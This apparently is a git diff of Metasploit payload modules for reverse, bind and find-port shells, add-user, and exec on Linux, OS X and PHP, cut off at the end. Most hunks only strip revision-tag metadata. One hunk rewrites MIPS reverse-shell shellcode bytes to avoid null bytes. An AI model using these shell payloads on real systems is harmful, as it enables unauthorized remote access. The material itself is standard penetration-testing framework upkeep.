cd95b7659c..e3b79898f5 100644 --- a/modules/payloads/singles/linux/mipsbe/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mipsbe/shell_reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Linux Command Shell, Reverse TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Connect back to attacker and spawn a command shell', 'Author' => 'Julien Tinnes', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb b/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb index 6a73205f29..38bb3a6462 100644 --- a/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -10,6 +6,7 @@ ## # Written in a hurry using shellforge and my MIPS shellforge loader (avail. on cr0.org) +# + Few removals of unneccessary zero bytes by kost require 'msf/core' require 'msf/core/handler/reverse_tcp' @@ -25,7 +22,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Linux Command Shell, Reverse TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Connect back to attacker and spawn a command shell', 'Author' => 'Julien Tinnes', 'License' => MSF_LICENSE, @@ -84,7 +80,7 @@ module Metasploit3 "\x02\x00\x05\x24" + # li a1,2 "\x21\x30\x00\x00" + # move a2,zero "\x57\x10\x02\x24" + # li v0,4183 - "\x0c\x00\x00\x00" + # syscall + "\x0c\x01\x01\x01" + # syscall "\x21\x18\x40\x00" + # move v1,v0 "\xff\xff\x02\x24" + # li v0,-1 "\x1a\x00\x62\x10" + # beq v1,v0,0xf4 @@ -93,29 +89,29 @@ module Metasploit3 "\x08\x00\xa5\x27" + # addiu a1,sp,8 "\x10\x00\x06\x24" + # li a2,16 "\x4a\x10\x02\x24" + # li v0,4170 - "\x0c\x00\x00\x00" + # syscall + "\x0c\x01\x01\x01" + # syscall "\x0e\x00\x40\x14" + # bnez v0,0xe0 "\x21\x28\x00\x00" + # move a1,zero "\xdf\x0f\x02\x24" + # li v0,4063 - "\x0c\x00\x00\x00" + # syscall + "\x0c\x01\x01\x01" + # syscall "\x01\x00\x05\x24" + # li a1,1 "\xdf\x0f\x02\x24" + # li v0,4063 - "\x0c\x00\x00\x00" + # syscall + "\x0c\x01\x01\x01" + # syscall "\x02\x00\x05\x24" + # li a1,2 "\xdf\x0f\x02\x24" + # li v0,4063 - "\x0c\x00\x00\x00" + # syscall + "\x0c\x01\x01\x01" + # syscall "\x21\x30\x00\x00" + # move a2,zero "\x21\x20\x20\x03" + # move a0,t9 "\x20\x00\xa5\x27" + # addiu a1,sp,32 "\xab\x0f\x02\x24" + # li v0,4011 - "\x0c\x00\x00\x00" + # syscall + "\x0c\x01\x01\x01" + # syscall "\x21\x20\x00\x00" + # move a0,zero "\xa1\x0f\x02\x24" + # li v0,4001 - "\x0c\x00\x00\x00" + # syscall + "\x0c\x01\x01\x01" + # syscall "\x08\x00\xe0\x03" + # jr ra "\x28\x00\xbd\x27" + # addiu sp,sp,40 "\xa1\x0f\x02\x24" + # li v0,4001 - "\x0c\x00\x00\x00" + # syscall + "\x0c\x01\x01\x01" + # syscall "\xe5\xff\x00\x10" + # b 0x94 "\x21\x20\x60\x00" + # move a0,v1 "\x2f\x62\x69\x6e" + # "/bin" diff --git a/modules/payloads/singles/linux/ppc/shell_bind_tcp.rb b/modules/payloads/singles/linux/ppc/shell_bind_tcp.rb index 10921d5706..f4b4e0bb57 100644 --- a/modules/payloads/singles/linux/ppc/shell_bind_tcp.rb +++ b/modules/payloads/singles/linux/ppc/shell_bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Linux Command Shell, Bind TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection and spawn a command shell', 'Author' => 'Ramon de C Valle', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/linux/ppc/shell_find_port.rb b/modules/payloads/singles/linux/ppc/shell_find_port.rb index aac94ed52d..1ef2d8dd01 100644 --- a/modules/payloads/singles/linux/ppc/shell_find_port.rb +++ b/modules/payloads/singles/linux/ppc/shell_find_port.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Linux Command Shell, Find Port Inline', - 'Version' => '$Revision$', 'Description' => 'Spawn a shell on an established connection', 'Author' => 'Ramon de C Valle', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/linux/ppc/shell_reverse_tcp.rb b/modules/payloads/singles/linux/ppc/shell_reverse_tcp.rb index 232f896895..681b2c81d2 100644 --- a/modules/payloads/singles/linux/ppc/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/ppc/shell_reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Linux Command Shell, Reverse TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Connect back to attacker and spawn a command shell', 'Author' => 'Ramon de C Valle', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/linux/ppc64/shell_bind_tcp.rb b/modules/payloads/singles/linux/ppc64/shell_bind_tcp.rb index aaa00a04a8..9fcbbfcb6c 100644 --- a/modules/payloads/singles/linux/ppc64/shell_bind_tcp.rb +++ b/modules/payloads/singles/linux/ppc64/shell_bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Linux Command Shell, Bind TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection and spawn a command shell', 'Author' => 'Ramon de C Valle', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/linux/ppc64/shell_find_port.rb b/modules/payloads/singles/linux/ppc64/shell_find_port.rb index 1997390010..dc72b95e22 100644 --- a/modules/payloads/singles/linux/ppc64/shell_find_port.rb +++ b/modules/payloads/singles/linux/ppc64/shell_find_port.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Linux Command Shell, Find Port Inline', - 'Version' => '$Revision$', 'Description' => 'Spawn a shell on an established connection', 'Author' => 'Ramon de C Valle', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/linux/ppc64/shell_reverse_tcp.rb b/modules/payloads/singles/linux/ppc64/shell_reverse_tcp.rb index aea0f1905c..cb120dd01a 100644 --- a/modules/payloads/singles/linux/ppc64/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/ppc64/shell_reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Linux Command Shell, Reverse TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Connect back to attacker and spawn a command shell', 'Author' => 'Ramon de C Valle', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/linux/x64/exec.rb b/modules/payloads/singles/linux/x64/exec.rb index f37f297e15..1f48228a4d 100644 --- a/modules/payloads/singles/linux/x64/exec.rb +++ b/modules/payloads/singles/linux/x64/exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -19,7 +15,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Linux Execute Command', - 'Version' => '$Revision$', 'Description' => 'Execute an arbitrary command', 'Author' => 'ricky', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/linux/x64/shell_bind_tcp.rb b/modules/payloads/singles/linux/x64/shell_bind_tcp.rb index 011d78bcf3..2c1cb6199e 100644 --- a/modules/payloads/singles/linux/x64/shell_bind_tcp.rb +++ b/modules/payloads/singles/linux/x64/shell_bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Linux Command Shell, Bind TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection and spawn a command shell', 'Author' => 'ricky', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/linux/x64/shell_find_port.rb b/modules/payloads/singles/linux/x64/shell_find_port.rb index 513c4751f1..494491b406 100644 --- a/modules/payloads/singles/linux/x64/shell_find_port.rb +++ b/modules/payloads/singles/linux/x64/shell_find_port.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Linux Command Shell, Find Port Inline', - 'Version' => '$Revision$', 'Description' => 'Spawn a shell on an established connection', 'Author' => 'mak', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/linux/x64/shell_reverse_tcp.rb b/modules/payloads/singles/linux/x64/shell_reverse_tcp.rb index 00b99bb387..0766ee3ad6 100644 --- a/modules/payloads/singles/linux/x64/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/x64/shell_reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Linux Command Shell, Reverse TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Connect back to attacker and spawn a command shell', 'Author' => 'ricky', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/linux/x86/adduser.rb b/modules/payloads/singles/linux/x86/adduser.rb index 5e7f59f279..4fdfe16420 100644 --- a/modules/payloads/singles/linux/x86/adduser.rb +++ b/modules/payloads/singles/linux/x86/adduser.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Linux Add User', - 'Version' => '$Revision$', 'Description' => 'Create a new user with UID 0', 'Author' => [ 'skape', 'vlad902', 'spoonm' ], 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/linux/x86/chmod.rb b/modules/payloads/singles/linux/x86/chmod.rb index 244bd6bbf7..502424045c 100644 --- a/modules/payloads/singles/linux/x86/chmod.rb +++ b/modules/payloads/singles/linux/x86/chmod.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Linux Chmod', - 'Version' => '$Revision$', 'Description' => 'Runs chmod on specified file with specified mode', 'Author' => 'kris katterjohn', 'License' => BSD_LICENSE, diff --git a/modules/payloads/singles/linux/x86/exec.rb b/modules/payloads/singles/linux/x86/exec.rb index 805283a8f5..8261d1441f 100644 --- a/modules/payloads/singles/linux/x86/exec.rb +++ b/modules/payloads/singles/linux/x86/exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Linux Execute Command', - 'Version' => '$Revision$', 'Description' => 'Execute an arbitrary command', 'Author' => 'vlad902', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/linux/x86/metsvc_bind_tcp.rb b/modules/payloads/singles/linux/x86/metsvc_bind_tcp.rb index f9fe8c5527..ad01db5ad0 100644 --- a/modules/payloads/singles/linux/x86/metsvc_bind_tcp.rb +++ b/modules/payloads/singles/linux/x86/metsvc_bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,7 +20,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Linux Meterpreter Service, Bind TCP', - 'Version' => '$Revision$', 'Description' => 'Stub payload for interacting with a Meterpreter Service', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/linux/x86/metsvc_reverse_tcp.rb b/modules/payloads/singles/linux/x86/metsvc_reverse_tcp.rb index f53daf1c78..4beba0b52a 100644 --- a/modules/payloads/singles/linux/x86/metsvc_reverse_tcp.rb +++ b/modules/payloads/singles/linux/x86/metsvc_reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,7 +20,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Linux Meterpreter Service, Reverse TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Stub payload for interacting with a Meterpreter Service', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/linux/x86/shell_bind_ipv6_tcp.rb b/modules/payloads/singles/linux/x86/shell_bind_ipv6_tcp.rb index dabd9490e4..ade77665e5 100644 --- a/modules/payloads/singles/linux/x86/shell_bind_ipv6_tcp.rb +++ b/modules/payloads/singles/linux/x86/shell_bind_ipv6_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Linux Command Shell, Bind TCP Inline (IPv6)', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection over IPv6 and spawn a command shell', 'Author' => 'kris katterjohn', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/linux/x86/shell_bind_tcp.rb b/modules/payloads/singles/linux/x86/shell_bind_tcp.rb index f1b167acff..646297f00c 100644 --- a/modules/payloads/singles/linux/x86/shell_bind_tcp.rb +++ b/modules/payloads/singles/linux/x86/shell_bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Linux Command Shell, Bind TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection and spawn a command shell', 'Author' => 'Ramon de C Valle', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/linux/x86/shell_find_port.rb b/modules/payloads/singles/linux/x86/shell_find_port.rb index 37c18bcdc4..4cd568c671 100644 --- a/modules/payloads/singles/linux/x86/shell_find_port.rb +++ b/modules/payloads/singles/linux/x86/shell_find_port.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Linux Command Shell, Find Port Inline', - 'Version' => '$Revision$', 'Description' => 'Spawn a shell on an established connection', 'Author' => 'Ramon de C Valle', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/linux/x86/shell_find_tag.rb b/modules/payloads/singles/linux/x86/shell_find_tag.rb index 9aaf5b8085..f599e6308b 100644 --- a/modules/payloads/singles/linux/x86/shell_find_tag.rb +++ b/modules/payloads/singles/linux/x86/shell_find_tag.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Linux Command Shell, Find Tag Inline', - 'Version' => '$Revision$', 'Description' => 'Spawn a shell on an established connection (proxy/nat safe)', 'Author' => 'skape', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb b/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb index 9993974e64..f2a9231650 100644 --- a/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Linux Command Shell, Reverse TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Connect back to attacker and spawn a command shell', 'Author' => 'Ramon de C Valle', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/linux/x86/shell_reverse_tcp2.rb b/modules/payloads/singles/linux/x86/shell_reverse_tcp2.rb index 43b011afc9..ec1159cc8c 100644 --- a/modules/payloads/singles/linux/x86/shell_reverse_tcp2.rb +++ b/modules/payloads/singles/linux/x86/shell_reverse_tcp2.rb @@ -1,6 +1,3 @@ -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +26,6 @@ module Metasploit3 # and: puts shellcode.decode super(merge_info(info, 'Name' => 'Linux Command Shell, Reverse TCP Inline - Metasm Demo', - 'Version' => '$Revision$', 'Description' => 'Connect back to attacker and spawn a command shell', 'Author' => ['skape', 'Yoann Guillot', 'Julien Tinnes '], 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/osx/armle/shell_bind_tcp.rb b/modules/payloads/singles/osx/armle/shell_bind_tcp.rb index db2769afa1..57a42e48e0 100644 --- a/modules/payloads/singles/osx/armle/shell_bind_tcp.rb +++ b/modules/payloads/singles/osx/armle/shell_bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Apple iOS Command Shell, Bind TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection and spawn a command shell', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/osx/armle/shell_reverse_tcp.rb b/modules/payloads/singles/osx/armle/shell_reverse_tcp.rb index 7001ad36b7..d3e414ec41 100644 --- a/modules/payloads/singles/osx/armle/shell_reverse_tcp.rb +++ b/modules/payloads/singles/osx/armle/shell_reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Apple iOS Command Shell, Reverse TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Connect back to attacker and spawn a command shell', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/osx/armle/vibrate.rb b/modules/payloads/singles/osx/armle/vibrate.rb index 0daea087e2..2d39522809 100644 --- a/modules/payloads/singles/osx/armle/vibrate.rb +++ b/modules/payloads/singles/osx/armle/vibrate.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,7 +17,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Apple iOS iPhone Vibrate', - 'Version' => '$Revision$', 'Description' => %q| Causes the iPhone to vibrate, only works when the AudioToolkit library has been loaded. Based on work by Charlie Miller . diff --git a/modules/payloads/singles/osx/ppc/shell_bind_tcp.rb b/modules/payloads/singles/osx/ppc/shell_bind_tcp.rb index 02e7b62787..172a85cf93 100644 --- a/modules/payloads/singles/osx/ppc/shell_bind_tcp.rb +++ b/modules/payloads/singles/osx/ppc/shell_bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'OS X Command Shell, Bind TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection and spawn a command shell', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/osx/ppc/shell_reverse_tcp.rb b/modules/payloads/singles/osx/ppc/shell_reverse_tcp.rb index 4af230e9dd..09d70c56f3 100644 --- a/modules/payloads/singles/osx/ppc/shell_reverse_tcp.rb +++ b/modules/payloads/singles/osx/ppc/shell_reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'OS X Command Shell, Reverse TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Connect back to attacker and spawn a command shell', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/osx/x64/exec.rb b/modules/payloads/singles/osx/x64/exec.rb index 0182620c3b..c6ddc09c94 100644 --- a/modules/payloads/singles/osx/x64/exec.rb +++ b/modules/payloads/singles/osx/x64/exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -19,7 +15,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'OS X x64 Execute Command', - 'Version' => '$Revision$', 'Description' => 'Execute an arbitrary command', 'Author' => 'argp ', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/osx/x64/say.rb b/modules/payloads/singles/osx/x64/say.rb index 8c33032fee..13939bc380 100644 --- a/modules/payloads/singles/osx/x64/say.rb +++ b/modules/payloads/singles/osx/x64/say.rb @@ -15,7 +15,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'OSX X64 say Shellcode', - 'Version' => '$Revision$', 'Description' => 'Say an arbitrary string outloud using Mac OS X text2speech', 'Author' => 'nemo ', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/osx/x64/shell_find_tag.rb b/modules/payloads/singles/osx/x64/shell_find_tag.rb index 9a6d5a9871..9224e29b2a 100644 --- a/modules/payloads/singles/osx/x64/shell_find_tag.rb +++ b/modules/payloads/singles/osx/x64/shell_find_tag.rb @@ -19,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'OSX Command Shell, Find Tag Inline', - 'Version' => '$Revision$', 'Description' => 'Spawn a shell on an established connection (proxy/nat safe)', 'Author' => 'nemo ', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/osx/x86/exec.rb b/modules/payloads/singles/osx/x86/exec.rb index 7e1066558b..ec3764ac7e 100644 --- a/modules/payloads/singles/osx/x86/exec.rb +++ b/modules/payloads/singles/osx/x86/exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'OS X Execute Command', - 'Version' => '$Revision$', 'Description' => 'Execute an arbitrary command', 'Author' => [ 'snagg ', 'argp ' ], 'License' => BSD_LICENSE, diff --git a/modules/payloads/singles/osx/x86/shell_bind_tcp.rb b/modules/payloads/singles/osx/x86/shell_bind_tcp.rb index 5596edd202..1a670141df 100644 --- a/modules/payloads/singles/osx/x86/shell_bind_tcp.rb +++ b/modules/payloads/singles/osx/x86/shell_bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'OS X Command Shell, Bind TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection and spawn a command shell', 'Author' => 'Ramon de C Valle', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/osx/x86/shell_find_port.rb b/modules/payloads/singles/osx/x86/shell_find_port.rb index 09b30939c0..f267005029 100644 --- a/modules/payloads/singles/osx/x86/shell_find_port.rb +++ b/modules/payloads/singles/osx/x86/shell_find_port.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'OS X Command Shell, Find Port Inline', - 'Version' => '$Revision$', 'Description' => 'Spawn a shell on an established connection', 'Author' => 'Ramon de C Valle', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/osx/x86/shell_reverse_tcp.rb b/modules/payloads/singles/osx/x86/shell_reverse_tcp.rb index 0930e45d5f..740a2d190d 100644 --- a/modules/payloads/singles/osx/x86/shell_reverse_tcp.rb +++ b/modules/payloads/singles/osx/x86/shell_reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'OS X Command Shell, Reverse TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Connect back to attacker and spawn a command shell', 'Author' => 'Ramon de C Valle', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/osx/x86/vforkshell_bind_tcp.rb b/modules/payloads/singles/osx/x86/vforkshell_bind_tcp.rb index 59fc2a610d..7346c6b7c6 100644 --- a/modules/payloads/singles/osx/x86/vforkshell_bind_tcp.rb +++ b/modules/payloads/singles/osx/x86/vforkshell_bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'OS X (vfork) Command Shell, Bind TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection, vfork if necessary, and spawn a command shell', 'Author' => 'ddz', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/osx/x86/vforkshell_reverse_tcp.rb b/modules/payloads/singles/osx/x86/vforkshell_reverse_tcp.rb index 51867ce76a..dfaebc3696 100644 --- a/modules/payloads/singles/osx/x86/vforkshell_reverse_tcp.rb +++ b/modules/payloads/singles/osx/x86/vforkshell_reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'OS X (vfork) Command Shell, Reverse TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Connect back to attacker, vfork if necessary, and spawn a command shell', 'Author' => 'ddz', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/php/bind_perl.rb b/modules/payloads/singles/php/bind_perl.rb index 727934ec3b..e9e2c619a4 100644 --- a/modules/payloads/singles/php/bind_perl.rb +++ b/modules/payloads/singles/php/bind_perl.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'PHP Command Shell, Bind TCP (via Perl)', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection and spawn a command shell via perl (persistent)', 'Author' => ['Samy ', 'cazz'], 'License' => BSD_LICENSE, diff --git a/modules/payloads/singles/php/bind_perl_ipv6.rb b/modules/payloads/singles/php/bind_perl_ipv6.rb index 203ddada59..0084726f30 100644 --- a/modules/payloads/singles/php/bind_perl_ipv6.rb +++ b/modules/payloads/singles/php/bind_perl_ipv6.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'PHP Command Shell, Bind TCP (via perl) IPv6', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection and spawn a command shell via perl (persistent) over IPv6', 'Author' => ['Samy ', 'cazz'], 'License' => BSD_LICENSE, diff --git a/modules/payloads/singles/php/bind_php.rb b/modules/payloads/singles/php/bind_php.rb index 05a6cfb67d..2c5f927a99 100644 --- 